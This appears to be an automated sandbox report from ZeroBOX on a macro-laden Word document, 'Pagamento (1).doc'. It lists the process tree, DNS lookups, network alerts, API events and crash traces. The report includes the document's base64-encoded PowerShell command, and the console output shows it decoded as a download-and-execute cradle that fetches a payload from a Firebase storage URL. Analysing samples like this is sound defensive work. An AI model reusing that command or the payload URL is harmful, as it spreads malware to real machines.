Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 18, 2023, 12:13 p.m.	June 18, 2023, 12:15 p.m.

Size	132.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Tiago Oliveira, Template: Normal, Last Saved By: SISTEMA -PC, Revision Number: 7, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Feb 28 04:44:00 2023, Last Saved Time/Date: Fri Jun 16 16:31:00 2023, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5	`8c390292fb5916ec70e5c64016675687`
SHA256	`5de1a4ad452af2f5bff7b232c22e2f397d1af97a95ee427d85ea927986d8b31f`
CRC32	`05139461`
ssdeep	`3072:ik07xEjkTkwRlrF+ix0p7dhlV/cDK6IN7EXDwXLCCJ:iDEjkomQgshoXDOLC`
Yara	Microsoft_Office_File_Zero - Microsoft Office File Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Generic_Malware_Zero - Generic Malware

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\test22\AppData\Local\Temp\Pagamento (1).doc"
3036
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAGkAcgBlAGIAYQBzAGUAcwB0AG8AcgBhAGcAZQAuAGcAbwBvAGcAbABlAGEAcABpAHMALgBjAG8AbQAvAHYAMAAvAGIALwBmAGkAcgAtADgAYwAxADQAZgAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBqAG8AZAAuAGoAcABnAD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQAzADcAMwA1AGYAMQBjAGMALQAzADUAZAAwAC0ANABjAGUAYQAtADgAYQAyADkALQA4ADEAMQBjAGUAYwA3ADEAZgBlADEAYgAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
  2184
cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\NWXfXw9WCe7l.bat" "
1184
- chcp.com chcp 65001
  2380
- PING.EXE ping -n 10 localhost
  2464
- RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2356

Name	Response	Post-Analysis Lookup
firebasestorage.googleapis.com	A 142.250.204.138 A 142.250.204.42 A 172.217.27.42 A 142.251.220.42 A 172.217.25.10 A 172.217.31.10 A 216.58.200.234 A 142.251.220.74 A 142.251.130.10 A 172.217.27.10 A 172.217.24.74 A 142.250.204.106 A 216.58.203.74 A 142.250.199.74 A 142.250.204.74 A 142.251.220.106	172.217.25.170

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.31.10	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49165 -> 172.217.31.10:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49165 172.217.31.10:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	a4:d0:2e:0c:fb:98:7c:38:24:ed:cc:2b:fe:74:aa:48:c4:9a:27:90

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 18, 2023, 12:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 18, 2023, 12:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 18, 2023, 12:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 18, 2023, 12:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 18, 2023, 12:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 18, 2023, 12:13 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 18, 2023, 12:13 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 18, 2023, 12:13 p.m.			0	0
IsDebuggerPresent June 18, 2023, 12:15 p.m.			0	0
IsDebuggerPresent June 18, 2023, 12:15 p.m.			0	0

Command line console output was observed (29 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: The term 'xWYojxpMG' is not recognized as the name of a cmdlet, function, scrip console_handle: 0x00000023	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: t file, or operable program. Check the spelling of the name, or if a path was i console_handle: 0x0000002f	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: ncluded, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: At line:10 char:18 console_handle: 0x00000047	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: + if (xWYojxpMG <<<< == 2.843074E+29) console_handle: 0x00000053	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: + CategoryInfo : ObjectNotFound: (xWYojxpMG:String) [], CommandNo console_handle: 0x0000005f	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: tFoundException console_handle: 0x0000006b	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: True console_handle: 0x00000013	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: The term 'oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbaf console_handle: 0x00000027	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: hj' is not recognized as the name of a cmdlet, function, script file, or operab console_handle: 0x00000033	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: le program. Check the spelling of the name, or if a path was included, verify t console_handle: 0x0000003f	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: hat the path is correct and try again. console_handle: 0x0000004b	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: At line:1 char:250 console_handle: 0x00000057	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: + IEX (New-Object Net.WebClient).DownloadString('https://firebasestorage.google console_handle: 0x00000063	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: apis.com/v0/b/fir-8c14f.appspot.com/o/jod.jpg?alt=media&token=3735f1cc-35d0-4ce console_handle: 0x0000006f	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: a-8a29-811cec71fe1b');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufba console_handle: 0x0000007b	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: iudbhjawdbafhj <<<< console_handle: 0x00000087	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: + CategoryInfo : ObjectNotFound: (oawnduawdnnhn92...aiudbhjawdbaf console_handle: 0x00000093	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: hj:String) [], CommandNotFoundException console_handle: 0x0000009f	1	1
WriteConsoleW June 18, 2023, 12:13 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000ab	1	1
WriteConsoleW June 18, 2023, 12:15 p.m.	buffer: DONT CLOSE THIS WINDOW! console_handle: 0x00000007	1	1
WriteConsoleW June 18, 2023, 12:15 p.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1
WriteConsoleW June 18, 2023, 12:15 p.m.	buffer: Active code page: 65001 console_handle: 0x00000013	1	1
WriteConsoleA June 18, 2023, 12:15 p.m.	buffer: Microsoft (R) .NET Framework Services Installation Utility Version 4.0.30319.17929 Copyright (C) Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleA June 18, 2023, 12:15 p.m.	buffer: USAGE: regsvcs.exe [options] AssemblyName Options: /? or /help Display this usage message. /fc Find or create target application (default). /c Create target application, error if it already exists. /exapp console_handle: 0x00000007	1	1
WriteConsoleA June 18, 2023, 12:15 p.m.	buffer: Expect an existing application. /tlb:<tlbfile> Filename for the exported type library. /appname:<name> Use the specified name for the target application. /parname:<name> Use the specified name or id for the target partition. /e console_handle: 0x00000007	1	1
WriteConsoleA June 18, 2023, 12:15 p.m.	buffer: xtlb Use an existing type library. /reconfig Reconfigure existing target application (default). /noreconfig Don't reconfigure existing target application. /u Uninstall target application. /nologo console_handle: 0x00000007	1	1
WriteConsoleA June 18, 2023, 12:15 p.m.	buffer: Suppress logo output. /quiet Suppress logo output and success output. /componly Configure components only, no methods or interfaces. /appdir:<path> Set application root directory to specified path. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384b88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003847c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003847c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e34b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e34b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e34b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e34b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e34b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e34b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e36b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 18, 2023, 12:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x050e36b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 18, 2023, 12:13 p.m.		1	1	0

Powershell script has download & invoke calls (1 event)

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ June 18, 2023, 12:14 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x737c33cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21 SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x737d2074 SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x667985c7 ??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28 DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4 _MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991 _MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d _MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x8007007b exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 108852260 registers.edi: 108852424 registers.eax: 108852260 registers.ebp: 108852340 registers.edx: 0 registers.ebx: 108853476 registers.esi: 2147942523 registers.ecx: 2147483648	1	0	0
__exception__ June 18, 2023, 12:14 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x737c33cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21 SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x737d3102 SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x667bf7d0 ??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed ??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871 DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef _MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0 _MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab ??0OdfStgParams@@QAE@XZ+0xec034 mso+0xfeef3a @ 0x709bef3a DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4 _MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0 _MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991 _MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4 _MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b _MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a _MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41 _MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43 _GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37 _GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d _GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667 _GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169 _GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6 wdCommandDispatch-0x964 winword+0x1602 @ 0x2f881602 wdCommandDispatch-0x9cc winword+0x159a @ 0x2f88159a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 2081740 registers.edi: 2081904 registers.eax: 2081740 registers.ebp: 2081820 registers.edx: 0 registers.ebx: 2082956 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

June 18, 2023, 12:14 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x737d2074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x667985c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 108852260
registers.edi: 108852424
registers.eax: 108852260
registers.ebp: 108852340
registers.edx: 0
registers.ebx: 108853476
registers.esi: 2147942523
registers.ecx: 2147483648

__exception__

June 18, 2023, 12:14 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x737d3102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x667bf7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871
